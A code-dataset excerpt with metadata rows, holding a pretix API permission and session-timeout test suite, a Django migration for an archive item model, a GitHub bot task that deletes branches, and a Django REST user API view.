array = raw.reshape([samples_read, 2])
array = array[:, 0] + 1j*array[:, 1]
return array, buffer_start, buffer_end
| true
| true
|
1c4940a471a05633b194d7313df6009ea37014ef
| 25,648
|
py
|
Python
|
src/tests/api/test_permissions.py
|
tixl/tixl
|
9f515a4b4e17a14d1990b29385475195438969be
|
[
"Apache-2.0"
] | null | null | null |
src/tests/api/test_permissions.py
|
tixl/tixl
|
9f515a4b4e17a14d1990b29385475195438969be
|
[
"Apache-2.0"
] | 8
|
2015-01-06T10:50:27.000Z
|
2015-01-18T18:38:18.000Z
|
src/tests/api/test_permissions.py
|
tixl/tixl
|
9f515a4b4e17a14d1990b29385475195438969be
|
[
"Apache-2.0"
] | null | null | null |
#
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 Raphael Michel and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
# This file is based on an earlier version of pretix which was released under the Apache License 2.0. The full text of
# the Apache License 2.0 can be obtained at <http://www.apache.org/licenses/LICENSE-2.0>.
#
# This file may have since been changed and any changes are released under the terms of AGPLv3 as described above. A
# full history of changes and contributors is available at <https://github.com/pretix/pretix>.
#
# This file contains Apache-licensed contributions copyrighted by: Ture Gjørup
#
# Unless required by applicable law or agreed to in writing, software distributed under the Apache License 2.0 is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under the License.
import time
import pytest
from django.test import override_settings
from django.utils.timezone import now
from pretix.base.models import Organizer
event_urls = [
(None, ''),
(None, 'categories/'),
('can_view_orders', 'invoices/'),
(None, 'items/'),
('can_view_orders', 'orders/'),
('can_view_orders', 'orderpositions/'),
(None, 'questions/'),
(None, 'quotas/'),
('can_view_vouchers', 'vouchers/'),
(None, 'subevents/'),
(None, 'taxrules/'),
('can_view_orders', 'waitinglistentries/'),
('can_view_orders', 'checkinlists/'),
]
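# Entries in event_permission_sub_urls below are
# (HTTP method, required permission (None = any team member), URL suffix,
#  expected status code when the permission is granted).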
event_permission_sub_urls = [
('get', 'can_change_event_settings', 'settings/', 200),
('patch', 'can_change_event_settings', 'settings/', 200),
('get', 'can_view_orders', 'revokedsecrets/', 200),
('get', 'can_view_orders', 'revokedsecrets/1/', 404),
('get', 'can_view_orders', 'orders/', 200),
('get', 'can_view_orders', 'orderpositions/', 200),
('delete', 'can_change_orders', 'orderpositions/1/', 404),
('post', 'can_change_orders', 'orderpositions/1/price_calc/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_orders', 'invoices/', 200),
('get', 'can_view_orders', 'invoices/1/', 404),
('post', 'can_change_orders', 'invoices/1/regenerate/', 404),
('post', 'can_change_orders', 'invoices/1/reissue/', 404),
('get', 'can_view_orders', 'waitinglistentries/', 200),
('get', 'can_view_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/', 400),
('delete', 'can_change_orders', 'waitinglistentries/1/', 404),
('patch', 'can_change_orders', 'waitinglistentries/1/', 404),
('put', 'can_change_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/1/send_voucher/', 404),
('get', None, 'categories/', 200),
('get', None, 'items/', 200),
('get', None, 'questions/', 200),
('get', None, 'quotas/', 200),
('get', None, 'discounts/', 200),
('post', 'can_change_items', 'items/', 400),
('get', None, 'items/1/', 404),
('put', 'can_change_items', 'items/1/', 404),
('patch', 'can_change_items', 'items/1/', 404),
('delete', 'can_change_items', 'items/1/', 404),
('post', 'can_change_items', 'categories/', 400),
('get', None, 'categories/1/', 404),
('put', 'can_change_items', 'categories/1/', 404),
('patch', 'can_change_items', 'categories/1/', 404),
('delete', 'can_change_items', 'categories/1/', 404),
('post', 'can_change_items', 'discounts/', 400),
('get', None, 'discounts/1/', 404),
('put', 'can_change_items', 'discounts/1/', 404),
('patch', 'can_change_items', 'discounts/1/', 404),
('delete', 'can_change_items', 'discounts/1/', 404),
('post', 'can_change_items', 'items/1/variations/', 404),
('get', None, 'items/1/variations/', 404),
('get', None, 'items/1/variations/1/', 404),
('put', 'can_change_items', 'items/1/variations/1/', 404),
('patch', 'can_change_items', 'items/1/variations/1/', 404),
('delete', 'can_change_items', 'items/1/variations/1/', 404),
('get', None, 'items/1/addons/', 404),
('get', None, 'items/1/addons/1/', 404),
('post', 'can_change_items', 'items/1/addons/', 404),
('put', 'can_change_items', 'items/1/addons/1/', 404),
('patch', 'can_change_items', 'items/1/addons/1/', 404),
('delete', 'can_change_items', 'items/1/addons/1/', 404),
('get', None, 'subevents/', 200),
('get', None, 'subevents/1/', 404),
('get', None, 'taxrules/', 200),
('get', None, 'taxrules/1/', 404),
('post', 'can_change_event_settings', 'taxrules/', 400),
('put', 'can_change_event_settings', 'taxrules/1/', 404),
('patch', 'can_change_event_settings', 'taxrules/1/', 404),
('delete', 'can_change_event_settings', 'taxrules/1/', 404),
('get', 'can_change_event_settings', 'sendmail_rules/', 200),
('get', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('post', 'can_change_event_settings', 'sendmail_rules/', 400),
('put', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('patch', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('delete', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_vouchers', 'vouchers/1/', 404),
('post', 'can_change_vouchers', 'vouchers/', 201),
('put', 'can_change_vouchers', 'vouchers/1/', 404),
('patch', 'can_change_vouchers', 'vouchers/1/', 404),
('delete', 'can_change_vouchers', 'vouchers/1/', 404),
('get', None, 'quotas/', 200),
('get', None, 'quotas/1/', 404),
('post', 'can_change_items', 'quotas/', 400),
('put', 'can_change_items', 'quotas/1/', 404),
('patch', 'can_change_items', 'quotas/1/', 404),
('delete', 'can_change_items', 'quotas/1/', 404),
('get', None, 'questions/', 200),
('get', None, 'questions/1/', 404),
('post', 'can_change_items', 'questions/', 400),
('put', 'can_change_items', 'questions/1/', 404),
('patch', 'can_change_items', 'questions/1/', 404),
('delete', 'can_change_items', 'questions/1/', 404),
('get', None, 'questions/1/options/', 404),
('get', None, 'questions/1/options/1/', 404),
('put', 'can_change_items', 'questions/1/options/1/', 404),
('patch', 'can_change_items', 'questions/1/options/1/', 404),
('delete', 'can_change_items', 'questions/1/options/1/', 404),
('post', 'can_change_orders', 'orders/', 400),
('patch', 'can_change_orders', 'orders/ABC12/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_paid/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_pending/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_expired/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_canceled/', 404),
('post', 'can_change_orders', 'orders/ABC12/approve/', 404),
('post', 'can_change_orders', 'orders/ABC12/deny/', 404),
('post', 'can_change_orders', 'orders/ABC12/extend/', 400),
('post', 'can_change_orders', 'orders/ABC12/create_invoice/', 404),
('post', 'can_change_orders', 'orders/ABC12/resend_link/', 404),
('post', 'can_change_orders', 'orders/ABC12/regenerate_secrets/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/1/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/1/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/confirm/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/refund/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/process/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/done/', 404),
('get', 'can_view_orders', 'checkinlists/', 200),
('post', 'can_change_orders', 'checkinlists/1/failed_checkins/', 400),
('post', 'can_change_event_settings', 'checkinlists/', 400),
('put', 'can_change_event_settings', 'checkinlists/1/', 404),
('patch', 'can_change_event_settings', 'checkinlists/1/', 404),
('delete', 'can_change_event_settings', 'checkinlists/1/', 404),
('get', 'can_view_orders', 'checkinlists/1/positions/', 404),
('post', 'can_change_orders', 'checkinlists/1/positions/3/redeem/', 404),
('post', 'can_create_events', 'clone/', 400),
('get', 'can_view_orders', 'cartpositions/', 200),
('get', 'can_view_orders', 'cartpositions/1/', 404),
('post', 'can_change_orders', 'cartpositions/', 400),
('delete', 'can_change_orders', 'cartpositions/1/', 404),
('post', 'can_view_orders', 'exporters/invoicedata/run/', 400),
('get', 'can_view_orders', 'exporters/invoicedata/download/bc3f9884-26ee-425b-8636-80613f84b6fa/3cb49ae6-eda3-4605-814e-099e23777b36/', 404),
]
org_permission_sub_urls = [
('get', 'can_change_organizer_settings', 'settings/', 200),
('patch', 'can_change_organizer_settings', 'settings/', 200),
('get', 'can_change_organizer_settings', 'webhooks/', 200),
('post', 'can_change_organizer_settings', 'webhooks/', 400),
('get', 'can_change_organizer_settings', 'webhooks/1/', 404),
('put', 'can_change_organizer_settings', 'webhooks/1/', 404),
('patch', 'can_change_organizer_settings', 'webhooks/1/', 404),
('delete', 'can_change_organizer_settings', 'webhooks/1/', 404),
('get', 'can_manage_customers', 'customers/', 200),
('post', 'can_manage_customers', 'customers/', 201),
('get', 'can_manage_customers', 'customers/1/', 404),
('patch', 'can_manage_customers', 'customers/1/', 404),
('post', 'can_manage_customers', 'customers/1/anonymize/', 404),
('put', 'can_manage_customers', 'customers/1/', 404),
('delete', 'can_manage_customers', 'customers/1/', 404),
('get', 'can_manage_customers', 'memberships/', 200),
('post', 'can_manage_customers', 'memberships/', 400),
('get', 'can_manage_customers', 'memberships/1/', 404),
('patch', 'can_manage_customers', 'memberships/1/', 404),
('put', 'can_manage_customers', 'memberships/1/', 404),
('delete', 'can_manage_customers', 'memberships/1/', 404),
('get', 'can_change_organizer_settings', 'membershiptypes/', 200),
('post', 'can_change_organizer_settings', 'membershiptypes/', 400),
('get', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('patch', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('put', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('delete', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('get', 'can_manage_gift_cards', 'giftcards/', 200),
('post', 'can_manage_gift_cards', 'giftcards/', 400),
('get', 'can_manage_gift_cards', 'giftcards/1/', 404),
('put', 'can_manage_gift_cards', 'giftcards/1/', 404),
('patch', 'can_manage_gift_cards', 'giftcards/1/', 404),
('get', 'can_manage_gift_cards', 'giftcards/1/transactions/', 404),
('get', 'can_manage_gift_cards', 'giftcards/1/transactions/1/', 404),
('get', 'can_change_organizer_settings', 'devices/', 200),
('post', 'can_change_organizer_settings', 'devices/', 400),
('get', 'can_change_organizer_settings', 'devices/1/', 404),
('put', 'can_change_organizer_settings', 'devices/1/', 404),
('patch', 'can_change_organizer_settings', 'devices/1/', 404),
('get', 'can_change_teams', 'teams/', 200),
('post', 'can_change_teams', 'teams/', 400),
('get', 'can_change_teams', 'teams/{team_id}/', 200),
('put', 'can_change_teams', 'teams/{team_id}/', 400),
('patch', 'can_change_teams', 'teams/{team_id}/', 200),
('get', 'can_change_teams', 'teams/{team_id}/members/', 200),
('delete', 'can_change_teams', 'teams/{team_id}/members/2/', 404),
('get', 'can_change_teams', 'teams/{team_id}/invites/', 200),
('get', 'can_change_teams', 'teams/{team_id}/invites/2/', 404),
('delete', 'can_change_teams', 'teams/{team_id}/invites/2/', 404),
('post', 'can_change_teams', 'teams/{team_id}/invites/', 400),
('get', 'can_change_teams', 'teams/{team_id}/tokens/', 200),
('get', 'can_change_teams', 'teams/{team_id}/tokens/0/', 404),
('delete', 'can_change_teams', 'teams/{team_id}/tokens/0/', 404),
('post', 'can_change_teams', 'teams/{team_id}/tokens/', 400),
]
event_permission_root_urls = [
('post', 'can_create_events', 400),
('put', 'can_change_event_settings', 400),
('patch', 'can_change_event_settings', 200),
('delete', 'can_change_event_settings', 204),
]
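# Entries above are (HTTP method, required permission, expected status code
# when the permission is granted); 'post' is exercised against the event
# collection, the other methods against a single event resource.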
@pytest.fixture
def token_client(client, team):
team.can_view_orders = True
team.can_view_vouchers = True
team.can_change_items = True
team.save()
t = team.tokens.create(name='Foo')
client.credentials(HTTP_AUTHORIZATION='Token ' + t.token)
return client
@pytest.mark.django_db
def test_organizer_allowed(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert resp.status_code == 200
@pytest.mark.django_db
def test_organizer_not_allowed(token_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = token_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_allowed_device(device_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = device_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_existing(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format('o2'))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events(token_client, team, organizer, event, url):
team.all_events = True
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events_device(device_client, device, organizer, event, url):
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events(token_client, organizer, team, event, url):
team.all_events = False
team.save()
team.limit_events.add(event)
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
device.limit_events.add(event)
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed(token_client, organizer, team, event, url):
team.all_events = False
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_existing(token_client, organizer, url, event):
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], True)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == urlset[2]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_not_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], False)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == 403
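# Session lifetime handling: absolute timeout, relative timeout, and long sessions.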
@pytest.mark.django_db
def test_log_out_after_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
@override_settings(PRETIX_LONG_SESSIONS=False)
def test_ignore_long_session_if_disabled_in_config(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_log_out_after_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_dont_logout_by_relative_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_update_session_activity(user_client, team, organizer, event):
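    # A successful request should refresh the session's last-used timestamp.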
t1 = int(time.time()) - 5
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = t1
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
assert user_client.session['pretix_auth_last_used'] > t1
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_device_subresource_permission_check(device_client, device, organizer, event, urlset):
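    # The settings read case is excluded from this generic device permission sweep.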
if urlset == ('get', 'can_change_event_settings', 'settings/', 200):
return
resp = getattr(device_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[1] is None or urlset[1] in device.permission_set():
assert resp.status_code == urlset[3]
else:
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2].format(team_id=team.pk)))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2].format(team_id=team.pk)))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_staff_requires_staff_session(user_client, organizer, team, event, url, user):
team.delete()
user.is_staff = True
user.save()
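    # Staff users are rejected until they open an explicit staff session.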
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
user.staffsession_set.create(date_start=now(), session_key=user_client.session.session_key)
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
| 45.314488
| 145
| 0.681535
|
| true
| true
|
1c4940b8959cc53cd05290301b2d13364041c21b
| 751
|
py
|
Python
|
archive/migrations/0002_auto_20181215_2009.py
|
WarwickAnimeSoc/aniMango
|
f927c2bc6eb484561ab38172ebebee6f03c8b13b
|
[
"MIT"
] | null | null | null |
archive/migrations/0002_auto_20181215_2009.py
|
WarwickAnimeSoc/aniMango
|
f927c2bc6eb484561ab38172ebebee6f03c8b13b
|
[
"MIT"
] | 6
|
2016-10-18T14:52:05.000Z
|
2020-06-18T15:14:41.000Z
|
archive/migrations/0002_auto_20181215_2009.py
|
WarwickAnimeSoc/aniMango
|
f927c2bc6eb484561ab38172ebebee6f03c8b13b
|
[
"MIT"
] | 6
|
2020-02-07T17:37:37.000Z
|
2021-01-15T00:01:43.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2018-12-15 20:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archive', '0001_initial'),
]
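    # Adjust the archive item's file field and its type choices.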
operations = [
migrations.AlterField(
model_name='item',
name='file',
field=models.FileField(help_text=b'The file that should be uploaded', upload_to=b'archive/'),
),
migrations.AlterField(
model_name='item',
name='type',
field=models.CharField(choices=[(b'im', b'Image'), (b'vi', b'Video'), (b'tx', b'Text File'), (b'we', b'Website File')], default=b'tx', max_length=2),
),
]
| 28.884615
| 161
| 0.585885
|
| true
| true
|
1c4941197e11bced5ec610532458438235e3a434
| 664
|
py
|
Python
|
src/oca_github_bot/tasks/delete_branch.py
|
tafaRU/oca-github-bot
|
4ede8cf4e7ffb6aa0fd02aadcdd53edfb94b211a
|
[
"MIT"
] | null | null | null |
src/oca_github_bot/tasks/delete_branch.py
|
tafaRU/oca-github-bot
|
4ede8cf4e7ffb6aa0fd02aadcdd53edfb94b211a
|
[
"MIT"
] | 1
|
2019-05-28T10:15:24.000Z
|
2019-05-28T10:15:24.000Z
|
src/oca_github_bot/tasks/delete_branch.py
|
tafaRU/oca-github-bot
|
4ede8cf4e7ffb6aa0fd02aadcdd53edfb94b211a
|
[
"MIT"
] | 1
|
2019-06-18T15:17:53.000Z
|
2019-06-18T15:17:53.000Z
|
# Copyright (c) ACSONE SA/NV 2018
# Distributed under the MIT License (http://opensource.org/licenses/MIT).
from .. import github
from ..config import switchable
from ..github import gh_call
from ..queue import getLogger, task
_logger = getLogger(__name__)
@task()
@switchable()
def delete_branch(org, repo, branch, dry_run=False):
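    # Resolve the branch ref via the GitHub API, then delete it unless this is a dry run.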
with github.repository(org, repo) as gh_repo:
gh_branch = gh_call(gh_repo.ref, f"heads/{branch}")
if dry_run:
_logger.info(f"DRY-RUN delete branch {branch} in {org}/{repo}")
else:
_logger.info(f"deleting branch {branch} in {org}/{repo}")
gh_call(gh_branch.delete)
| 30.181818
| 75
| 0.674699
|
| true
| true
|
1c49418810ea5ca5da0598ff490ca27f6dd4bd50
| 4,785
|
py
|
Python
|
had/app/views/api/v1/persons/phone_api.py
|
eduardolujan/hexagonal_architecture_django
|
8055927cb460bc40f3a2651c01a9d1da696177e8
|
[
"BSD-3-Clause"
] | 6
|
2020-08-09T23:41:08.000Z
|
2021-03-16T22:05:40.000Z
|
had/app/views/api/v1/persons/phone_api.py
|
eduardolujan/hexagonal_architecture_django
|
8055927cb460bc40f3a2651c01a9d1da696177e8
|
[
"BSD-3-Clause"
] | 1
|
2020-10-02T02:59:38.000Z
|
2020-10-02T02:59:38.000Z
|
had/app/views/api/v1/persons/phone_api.py
|
eduardolujan/hexagonal_architecture_django
|
8055927cb460bc40f3a2651c01a9d1da696177e8
|
[
"BSD-3-Clause"
] | 2
|
2021-03-16T22:05:43.000Z
|
2021-04-30T06:35:25.000Z
|
# -*- coding: utf-8 -*-
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny
from modules.shared.infrastructure.serializers.django.serializer_manager import (
SerializerManager as DjangoSerializerManager,
)
from modules.users.infrastructure.serializers.django import (
UserSerializer as DjangoUserSerializer,
GetUserSerializer as DjangoGetUserSerializer,
CreateUserSerializer as DjangoCreateUserSerializer,
)
from modules.shared.infrastructure.log import LoggerDecorator, PyLoggerService
from modules.shared.infrastructure.requests.django import Request as DjangoRequest
from modules.shared.infrastructure.responses.django import RestResponse as DjangoRestResponse
from modules.shared.infrastructure.persistence.django import UnitOfWork as DjangoUnitOfWork
from modules.shared.infrastructure.passwords.django import PasswordCreator as DjangoPasswordCreator
from modules.users.infrastructure.repository.django import (
UserRepository as DjangoUserRepository
)
from modules.users.application.api.v1 import GetUserApi, CreateUserApi, UpdateUserApi, DeleteUserApi
@LoggerDecorator(logger=PyLoggerService(file_path=__file__))
class UserApi(APIView):
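    """User CRUD endpoints that delegate to the application-layer use cases."""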
# authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [AllowAny]
def get(self, request, _id: str = None):
"""
Get User
@param request:
@type request:
@param _id:
@type _id:
@return:
@rtype:
"""
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
request_serializer_manager = DjangoSerializerManager(DjangoGetUserSerializer)
response_serializer_manager = DjangoSerializerManager(DjangoUserSerializer)
user_get_api = GetUserApi(request,
response,
user_repository,
request_serializer_manager,
response_serializer_manager)
response = user_get_api(_id)
return response
def post(self, request, _id: str = None):
"""
Post User
@param request: request
@type request: response
@param _id: user id
@type _id: int
@return: post response
@rtype: Response
"""
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
unit_of_work = DjangoUnitOfWork()
password_creator = DjangoPasswordCreator()
user_serializer_manager = DjangoSerializerManager(DjangoCreateUserSerializer)
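        # Assemble the create-user use case from its infrastructure collaborators.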
create_user_api = CreateUserApi(request,
response,
user_serializer_manager,
user_repository,
password_creator,
unit_of_work)
response = create_user_api()
return response
def put(self, request, _id: str = None):
"""
Update User
@param request: request
@type request: response
@param _id: user id
@type _id: int
@return: post response
@rtype: Response
"""
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
unit_of_work = DjangoUnitOfWork()
password_creator = DjangoPasswordCreator()
user_serializer_manager = DjangoSerializerManager(DjangoCreateUserSerializer)
update_user_api = UpdateUserApi(request,
response,
user_serializer_manager,
user_repository,
password_creator,
unit_of_work)
response = update_user_api()
return response
def delete(self, request, _id):
"""
Delete user api
@param request:
@type request:
@param _id:
@type _id:
@return:
@rtype:
"""
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
request_serializer_manager = DjangoSerializerManager(DjangoGetUserSerializer)
delete_user_api = DeleteUserApi(request,
response,
request_serializer_manager,
user_repository)
response = delete_user_api(_id)
return response
| 37.97619
| 100
| 0.614629
|
| true
| true
|